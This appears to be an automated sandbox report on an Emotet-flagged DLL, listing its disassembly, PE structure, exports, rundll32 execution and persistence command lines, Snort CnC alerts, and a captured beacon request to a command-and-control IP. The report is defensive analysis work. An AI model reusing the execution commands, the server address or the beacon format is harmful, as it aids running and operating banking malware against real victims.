and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 1003B40Ch
mov dword ptr [ecx], 1003B404h
ret
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 1003B3DCh
push eax
call 00007FF1C8DDD136h
test byte ptr [ebp+08h], 00000001h
pop ecx
je 00007FF1C8DD9A2Ch
push 0000000Ch
push esi
call 00007FF1C8DD8EADh
pop ecx
pop ecx
mov eax, esi
pop esi
pop ebp
retn 0004h
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007FF1C8DD999Fh
push 0004CC44h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x4d710	0x5c0	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x4dcd0	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x52000	0x24410	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x77000	0x33a0	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x498f8	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x3b000	0x2f8	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x3930c	0x39400	False	0.530729735262	data	6.66187646144	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x3b000	0x13cfe	0x13e00	False	0.464512087264	data	5.41556152438	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x4f000	0x252c	0x1800	False	0.223795572917	data	3.845062089	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x52000	0x24410	0x24600	False	0.818513745704	data	7.74948390886	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x77000	0x33a0	0x3400	False	0.71484375	data	6.58405020621	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
REGISTRY	0x758d0	0x98	ASCII text, with CRLF line terminators	English	United States
REGISTRY	0x75968	0x260	ASCII text, with CRLF line terminators	English	United States
TYPELIB	0x75bc8	0x69c	data	English	United States
RT_BITMAP	0x52220	0x23467	data	English	United States
RT_STRING	0x76268	0x26	data	English	United States
RT_VERSION	0x75688	0x244	data	English	United States
RT_MANIFEST	0x76290	0x17d	XML 1.0 document text	English	United States

Imports

DLL	Import
pdh.dll	PdhGetFormattedCounterValue, PdhCollectQueryData, PdhCloseQuery, PdhRemoveCounter, PdhAddCounterW, PdhValidatePathW, PdhOpenQueryW
KERNEL32.dll	GetErrorMode, GetThreadErrorMode, GetCommandLineA, GetEnvironmentStringsW, GetCurrentProcessorNumber, IsDebuggerPresent, GetTickCount64, AreFileApisANSI, GetOEMCP, GetCommandLineW, TlsAlloc, GetCurrentThreadId, GetSystemDefaultUILanguage, MultiByteToWideChar, RaiseException, GetLastError, InitializeCriticalSectionEx, DeleteCriticalSection, DecodePointer, EnterCriticalSection, LeaveCriticalSection, LoadResource, SizeofResource, FindResourceW, GetModuleHandleW, GetProcAddress, LoadLibraryExW, GetModuleFileNameW, lstrcmpiW, FreeLibrary, MulDiv, SetLastError, TerminateProcess, SetFilePointerEx, ReadConsoleW, GetConsoleMode, GetConsoleCP, WriteFile, GetCurrentThread, EnumSystemLocalesW, GetUserDefaultLCID, IsValidLocale, FreeEnvironmentStringsW, IsValidCodePage, FindFirstFileExA, HeapReAlloc, HeapSize, GetFileType, GetStdHandle, GetModuleFileNameA, GetModuleHandleExW, ExitProcess, InterlockedFlushSList, RtlUnwind, LocalFree, LoadLibraryExA, VirtualFree, VirtualAlloc, FlushInstructionCache, InterlockedPushEntrySList, InterlockedPopEntrySList, HeapFree, HeapAlloc, OutputDebugStringW, GetCPInfo, GetStringTypeW, GetLocaleInfoW, LCMapStringW, TlsFree, TlsSetValue, TlsGetValue, InitializeCriticalSectionAndSpinCount, EncodePointer, GetSystemDefaultLangID, GetACP, SwitchToThread, IsProcessorFeaturePresent, UnregisterApplicationRestart, IsSystemResumeAutomatic, GetProcessHeap, CloseHandle, ReadFile, FindClose, GetUserDefaultUILanguage, FindNextFileA, SetStdHandle, WriteConsoleW, CreateFileW, GetCurrentProcess, SetUnhandledExceptionFilter, FlushFileBuffers, WideCharToMultiByte, InitializeSListHead, GetSystemTimeAsFileTime, GetCurrentProcessId, QueryPerformanceCounter, GetStartupInfoW, UnhandledExceptionFilter
USER32.dll	GetMenuCheckMarkDimensions, GetForegroundWindow, AnyPopup, CloseClipboard, GetClipboardViewer, GetWindowLongW, GetKBCodePage, CallWindowProcW, DrawTextW, InsertMenuW, RegisterClassExW, LoadCursorW, GetClassInfoExW, DefWindowProcW, IsWindow, GetParent, SetTimer, ShowWindow, InvalidateRect, ReleaseDC, GetDC, EndPaint, BeginPaint, ClientToScreen, GetClientRect, SendMessageW, DestroyWindow, CreateWindowExW, SetWindowLongW, CharNextW, UnregisterClassW, DestroyCaret, EmptyClipboard, GetDialogBaseUnits, GetShellWindow, GetOpenClipboardWindow
GDI32.dll	SetBkMode, SetTextColor, CreateFontW, DeleteDC, BitBlt, CreateCompatibleDC, CreateCompatibleBitmap, DeleteObject, SelectObject, GetDeviceCaps, GetTextMetricsW
ADVAPI32.dll	RegDeleteValueW, RegQueryInfoKeyW, RegSetValueExW, RegEnumKeyExW, RegCloseKey, RegDeleteKeyW, RegCreateKeyExW, RegOpenKeyExW
SHELL32.dll	ShellExecuteW, SHGetFolderPathW
ole32.dll	CoFreeUnusedLibraries, CoUninitialize, CoCreateInstance, CoInitialize, OleRun, CoTaskMemAlloc, CoTaskMemRealloc, CoTaskMemFree
OLEAUT32.dll	LoadRegTypeLib, SysAllocStringLen, SysFreeString, SysAllocString, SysStringLen, VarBstrCmp, VariantInit, VariantClear, VariantCopy, VariantChangeType, VarUI4FromStr, LoadTypeLib

Exports

Name	Ordinal	Address
Control_RunDLL	1	0x10001200
abziuleoxsborpb	2	0x10001570
aejkroaebsbxdnkhb	3	0x10001430
amgshvm	4	0x10001340
bjtmgxqrshhlmbh	5	0x10001320
ciqnowraabbra	6	0x100013e0
cmiqzvq	7	0x10001450
crprctzst	8	0x10001360
cwiynhgawsfh	9	0x100012f0
dhfyfrdbpo	10	0x100012c0
dvmyigplnf	11	0x10001480
erlpzdqhrlacaxnda	12	0x10001440
euduauchas	13	0x100014b0
fjorczheej	14	0x10001390
fqtruzg	15	0x100014c0
fzxvmnutn	16	0x100014d0
ghrfpkc	17	0x10001280
ghrmmrvezk	18	0x10001530
hjbgnfzrilso	19	0x100015d0
hvbblczdjkdx	20	0x10001310
ifsmmtyjag	21	0x10001310
jbgiwxjtyvvaxuitk	22	0x10001410
jhjtpuvq	23	0x10001260
jovvzziqyeznb	24	0x100015a0
kbkufclc	25	0x100014e0
kxpdpqduritjwfv	26	0x10001560
lfirwsslmgzmfg	27	0x10001330
mdaepyqwwigtzy	28	0x10001500
meqzizr	29	0x10001350
mmykgdmikdunzlhbb	30	0x10001520
mxqliouinhlsqvw	31	0x100013b0
mzxbssgzqetjmifs	32	0x10001490
ndzjkcaftnq	33	0x10001510
nfwlevhbaunupm	34	0x100013c0
njhdfbkyxqtwtcvsa	35	0x10001300
nmzgdiluzbemovs	36	0x10001400
obsypougzzamg	37	0x100013d0
oqzjqpsxbjh	38	0x100012d0
ormmaboaiinycs	39	0x10001230
pejacnmfhwmlhqc	40	0x10001340
pzgjkxaqryk	41	0x100015b0
qlsxhmuh	42	0x10001240
rykrtqanuszehh	43	0x10001550
sktlwejyhkbweva	44	0x100014a0
sromrbjt	45	0x10001460
txrogplicljtdlky	46	0x100012e0
tywxzfemhfuvwwqtq	47	0x10001270
ukeirvjwemstdk	48	0x10001250
usfroye	49	0x10001370
varapmou	50	0x100013a0
vjfbgya	51	0x100015c0
vpzxnmg	52	0x10001590
wniijfgeibtaumvma	53	0x100014f0
wtkpnwha	54	0x10001470
xkdmdojzjns	55	0x10001420
yumftkya	56	0x100012a0
ywkvngmohrw	57	0x10001380
ywwwgcpzcec	58	0x10001580
yyldomdvsymz	59	0x10001290
zdcdzgtngf	60	0x100012b0
zwxnlwalmcbgmt	61	0x100013f0
zzvywuxdvuecsm	62	0x10001540

Version Infos

Description	Data
InternalName	Erulfuaekg.dll
FileVersion	3.3.7.9
ProductName	Erulfuaekg
ProductVersion	3.3.7.9
FileDescription	asdzxcqwe123
OriginalFilename	Erulfuaekg.dll
Translation	0x0408 0x04e4

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
11/19/21-01:05:43.275474	TCP	2404334	ET CNC Feodo Tracker Reported CnC Server TCP group 18	49747	443	192.168.2.3	51.178.61.60

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 19, 2021 01:05:43.275474072 CET	49747	443	192.168.2.3	51.178.61.60
Nov 19, 2021 01:05:43.275517941 CET	443	49747	51.178.61.60	192.168.2.3
Nov 19, 2021 01:05:43.275712967 CET	49747	443	192.168.2.3	51.178.61.60
Nov 19, 2021 01:05:43.299204111 CET	49747	443	192.168.2.3	51.178.61.60
Nov 19, 2021 01:05:43.299223900 CET	443	49747	51.178.61.60	192.168.2.3
Nov 19, 2021 01:05:43.413537025 CET	443	49747	51.178.61.60	192.168.2.3
Nov 19, 2021 01:05:43.413645029 CET	49747	443	192.168.2.3	51.178.61.60
Nov 19, 2021 01:05:44.099797964 CET	49747	443	192.168.2.3	51.178.61.60
Nov 19, 2021 01:05:44.099821091 CET	443	49747	51.178.61.60	192.168.2.3
Nov 19, 2021 01:05:44.100207090 CET	443	49747	51.178.61.60	192.168.2.3
Nov 19, 2021 01:05:44.100284100 CET	49747	443	192.168.2.3	51.178.61.60
Nov 19, 2021 01:05:44.103406906 CET	49747	443	192.168.2.3	51.178.61.60
Nov 19, 2021 01:05:44.144865990 CET	443	49747	51.178.61.60	192.168.2.3
Nov 19, 2021 01:05:44.345132113 CET	443	49747	51.178.61.60	192.168.2.3
Nov 19, 2021 01:05:44.345248938 CET	443	49747	51.178.61.60	192.168.2.3
Nov 19, 2021 01:05:44.345266104 CET	49747	443	192.168.2.3	51.178.61.60
Nov 19, 2021 01:05:44.345321894 CET	49747	443	192.168.2.3	51.178.61.60
Nov 19, 2021 01:05:44.458115101 CET	49747	443	192.168.2.3	51.178.61.60
Nov 19, 2021 01:05:44.458143950 CET	443	49747	51.178.61.60	192.168.2.3

HTTP Request Dependency Graph

51.178.61.60

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49747	51.178.61.60	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Direction	Data
2021-11-19 00:05:44 UTC	OUT	GET /BJKdnuOnKNLLGEDBpJpeXPiWYvJQgGvoYhhdIpnN HTTP/1.1 Cookie: kpcXAWpZfRkJEAy=i+5bJ+1ZInDjvfPM+1JhKt+KWj8rVMERTO3MBxIOillAvxAx2ioHmQPbtLgNLA6EGFRwLshnv6kCnZWyIXAgbMZzd1u5zeY7pIcnc7NYlk4ptgX0JiJVkIXW1dfaYySomVYPcSiwpIcomQgIb/a5XevS7QE2etUd+zxfOWZFj62QjzAO7FAj4VKuBSkPo+IBUjmiQKTNcL09qokscyBsIQcAMaCCPfrdl8uN2W5z+g+7 Host: 51.178.61.60 Connection: Keep-Alive Cache-Control: no-cache
2021-11-19 00:05:44 UTC	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 19 Nov 2021 00:05:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2021-11-19 00:05:44 UTC	IN	Data Raw: 33 65 66 0d 0a 64 ca 1e 80 24 75 d9 5f ee 00 12 92 90 60 fe f8 4d d1 a6 22 5d 8c 03 6e 4b a1 65 50 63 f0 b0 2c 53 25 07 40 a3 d4 75 42 b0 75 c8 40 29 fa 6d bd 0e 24 50 70 4b a0 6d 4a 27 64 30 32 1c a5 25 f6 a7 bb 80 a9 b6 03 92 b0 86 98 93 28 65 f6 fe 17 3c 99 d3 e1 42 66 bc 20 1d de 33 25 a4 8e 5c 71 33 e9 ca 67 9b 05 79 4c cf b2 00 84 fa c7 cc 22 0c b8 4d ea ea 2b 14 fa 7a f2 30 5f e2 99 0e b9 6b 60 ce 5f b4 b8 2b 21 87 95 68 af c6 3e b3 b9 ae f2 90 f2 ba 41 bc dc 54 85 fb 2b 24 b4 82 48 be e2 65 61 34 59 b3 40 c2 f7 db 69 ed 16 4d 8a f2 1f 59 b0 eb 38 4b c6 36 68 f8 75 17 c3 98 f6 b0 3c cc b2 08 8a bd 1c 2f b7 cf a2 d1 fe e9 df 23 dd 25 e4 6f ab 7c be 65 6e 4f 19 56 78 f9 f1 73 7d 71 19 7c 8d 08 35 28 57 9f f0 2d 2b 35 7e 87 17 f5 5a f0 0e f3 d7 86 b1 Data Ascii: 3efd$u_`M"]nKePc,S%@uBu@)m$PpKmJ'd02%(e<Bf 3%\q3gyL"M+z0_k`_+!h>AT+$Hea4Y@iMY8K6hu</#%o\|enOVxs}q\|5(W-+5~Z

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 6164 Parent PID: 4864

General

Start time:	01:04:10
Start date:	19/11/2021
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe "C:\Users\user\Desktop\wNjqkrm8pH.dll"
Imagebase:	0xe10000
File size:	893440 bytes
MD5 hash:	72FCD8FB0ADC38ED9050569AD673650E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000002.415487729.000000000117D000.00000004.00000020.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 2804 Parent PID: 6164

General

Start time:	01:04:10
Start date:	19/11/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe "C:\Users\user\Desktop\wNjqkrm8pH.dll",#1
Imagebase:	0xd80000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6280 Parent PID: 6164

General

Start time:	01:04:11
Start date:	19/11/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\wNjqkrm8pH.dll,Control_RunDLL
Imagebase:	0x1150000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000002.352283785.0000000000E2A000.00000004.00000020.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 5940 Parent PID: 2804

General

Start time:	01:04:11
Start date:	19/11/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\wNjqkrm8pH.dll",#1
Imagebase:	0x1150000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.352402052.000000000344A000.00000004.00000020.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6416 Parent PID: 6164

General

Start time:	01:04:15
Start date:	19/11/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\wNjqkrm8pH.dll,abziuleoxsborpb
Imagebase:	0x1150000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.415304095.00000000032EA000.00000004.00000020.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6420 Parent PID: 6164

General

Start time:	01:04:23
Start date:	19/11/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\wNjqkrm8pH.dll,aejkroaebsbxdnkhb
Imagebase:	0x1150000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.413760673.0000000000D1A000.00000004.00000020.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 2944 Parent PID: 5940

General

Start time:	01:04:38
Start date:	19/11/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\wNjqkrm8pH.dll",Control_RunDLL
Imagebase:	0x1150000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 672 Parent PID: 6280

General

Start time:	01:04:38
Start date:	19/11/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Hsngzdtsiohsyp\jlodhhplzusb.iie",cwqsUWjgRvl
Imagebase:	0x1150000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.426884632.000000000328A000.00000004.00000020.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6828 Parent PID: 6416

General

Start time:	01:04:56
Start date:	19/11/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\wNjqkrm8pH.dll",Control_RunDLL
Imagebase:	0x1150000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 1304 Parent PID: 6420

General

Start time:	01:05:05
Start date:	19/11/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\wNjqkrm8pH.dll",Control_RunDLL
Imagebase:	0x1150000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6848 Parent PID: 6164

General

Start time:	01:05:06
Start date:	19/11/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\wNjqkrm8pH.dll",Control_RunDLL
Imagebase:	0x1150000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: svchost.exe PID: 5932 Parent PID: 572

General

Start time:	01:05:12
Start date:	19/11/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff70d6e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: rundll32.exe PID: 6388 Parent PID: 672

General

Start time:	01:05:13
Start date:	19/11/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Hsngzdtsiohsyp\jlodhhplzusb.iie",Control_RunDLL
Imagebase:	0x1150000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.816631755.0000000000C67000.00000004.00000020.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: svchost.exe PID: 5416 Parent PID: 572

General

Start time:	01:05:48
Start date:	19/11/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff70d6e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: svchost.exe PID: 2276 Parent PID: 572

General

Start time:	01:06:12
Start date:	19/11/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff70d6e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: svchost.exe PID: 2236 Parent PID: 572

General

Start time:	01:06:35
Start date:	19/11/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff70d6e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: loaddll32.exe PID: 6164 Parent PID: 4864 loaddll32.exeCOMMON

Executed Functions

Function 6E9B6620, Relevance: 80.7, APIs: 44, Strings: 1, Instructions: 1995COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 6E9B6692
__aullrem.LIBCMT ref: 6E9B66C6
GetTickCount64.KERNEL32 ref: 6E9B676C
GetTickCount64.KERNEL32 ref: 6E9B6772
GetTickCount64.KERNEL32 ref: 6E9B67A1
GetTickCount64.KERNEL32 ref: 6E9B67A7
GetShellWindow.USER32 ref: 6E9B6927
GetOEMCP.KERNEL32 ref: 6E9B69D2

Part of subcall function 6E9B5D90: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6E9B5E04
Part of subcall function 6E9B5D90: SwitchToThread.KERNEL32(00000000,?,?,?,?,?,?), ref: 6E9B5E74
Part of subcall function 6E9B5D90: GetOpenClipboardWindow.USER32(00000000,?,?,?), ref: 6E9B5E93
Part of subcall function 6E9B5D90: GetACP.KERNEL32(00000000,?,?,?), ref: 6E9B5EA4

CoFreeUnusedLibraries.OLE32 ref: 6E9B6A30

Part of subcall function 6E9B5A30: GetOpenClipboardWindow.USER32(00000000,?,00000000,6E9B6431,0000002E,00000000,00000000,?,0000002E,00000000), ref: 6E9B5A3C
Part of subcall function 6E9B5A30: CloseClipboard.USER32 ref: 6E9B5A73
Part of subcall function 6E9B5A30: GetMenuCheckMarkDimensions.USER32 ref: 6E9B5B30

Strings

?, xrefs: 6E9B691B

Memory Dump Source

Source File: 00000000.00000002.415594585.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000000.00000002.415587690.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415639399.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415675490.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.415694970.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: Count64Tick$ClipboardWindow$Open$CheckCloseDimensionsFreeLibrariesMarkMenuShellSwitchThreadUnothrow_t@std@@@Unused__aulldiv__aullrem__ehfuncinfo$??2@
String ID: ?
API String ID: 1511855008-1684325040
Opcode ID: a3bda2f4c2dba6171f27a29830d9f1327a9f426674f05da158d35632c4c86e64
Instruction ID: feb4d5fb6d282f458fe21f4023dc38e841682a259f47522a551f9c03b3f85a0f
Opcode Fuzzy Hash: a3bda2f4c2dba6171f27a29830d9f1327a9f426674f05da158d35632c4c86e64
Instruction Fuzzy Hash: AF136C31C14B5D8ACB26DFBAC8416AEF375AF9A340F148756E80977291EB30A9C1DF40

Uniqueness

Uniqueness Score: -1.00%

Function 0104441E, Relevance: 15.3, Strings: 12, Instructions: 329COMMON

Download Yara Rule

Strings

Pe, xrefs: 01044854
}, xrefs: 01044657
|BC, xrefs: 01044813
.~P, xrefs: 010446FF
E>&, xrefs: 0104447B
]jP, xrefs: 01044AB2
'N2, xrefs: 0104444E
]jP, xrefs: 0104491E
}L~, xrefs: 01044757
UKR, xrefs: 01044710
3I, xrefs: 0104487A
bK, xrefs: 010445FD

Memory Dump Source

Source File: 00000000.00000002.415198092.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: true

Similarity

API ID:
String ID: .~P$3I$E>&$Pe$UKR$]jP$]jP$bK$|BC$}L~$'N2$}
API String ID: 0-887363794
Opcode ID: 2d461c991c8263372d1563b4b3023f00fb181613337b5aa09c3ed157df988ce9
Instruction ID: 59b5e9d17575c8431c0de431ca8ade482948303c057024ea7c8123cf13a66939
Opcode Fuzzy Hash: 2d461c991c8263372d1563b4b3023f00fb181613337b5aa09c3ed157df988ce9
Instruction Fuzzy Hash: 14F111B15083809FD368DF65C98AA5BBBF1FBC4398F108A1DF1DA96260D7B08549CF46

Uniqueness

Uniqueness Score: -1.00%

Function 0105CAA8, Relevance: 3.9, Strings: 3, Instructions: 150COMMON

Download Yara Rule

Strings

i\[, xrefs: 0105CC0A
:N, xrefs: 0105CC18
JrU, xrefs: 0105CB1C

Memory Dump Source

Source File: 00000000.00000002.415198092.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: true

Similarity

API ID: CreateProcess
String ID: :N$JrU$i\[
API String ID: 963392458-199651125
Opcode ID: 376ca744e12d20fdec77dc4e9c009c91e62e708f38869c5c5c4e5919ba3bceee
Instruction ID: 6126b8ec1322499636af866ca45c2761642e866491f0fe576cd50d9c4e10504a
Opcode Fuzzy Hash: 376ca744e12d20fdec77dc4e9c009c91e62e708f38869c5c5c4e5919ba3bceee
Instruction Fuzzy Hash: 59611272D0021EEBDF04CFE1D94A9EEBBB6FB48304F208159E915BA260D7B55A15CF90

Uniqueness

Uniqueness Score: -1.00%

Function 6E9B5730, Relevance: 2.7, Strings: 2, Instructions: 226COMMON

Download Yara Rule

Strings

s, xrefs: 6E9B57A0
$, xrefs: 6E9B577C

Memory Dump Source

Source File: 00000000.00000002.415594585.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000000.00000002.415587690.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415639399.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415675490.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.415694970.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: $$s
API String ID: 0-4175558158
Opcode ID: d214bc8d793591d3097ee5040b035c717a5f74bb07a09a643d5fe2f39eac4753
Instruction ID: 3c73b39edddc734ece413befce9e9e3869bf60cb4a72a82d568c1a5e01bf20fe
Opcode Fuzzy Hash: d214bc8d793591d3097ee5040b035c717a5f74bb07a09a643d5fe2f39eac4753
Instruction Fuzzy Hash: A1912930A082678BCB0DCF6CD8516F9FBB1BF59304F0482ADD845D7252DB74AA69CB80

Uniqueness

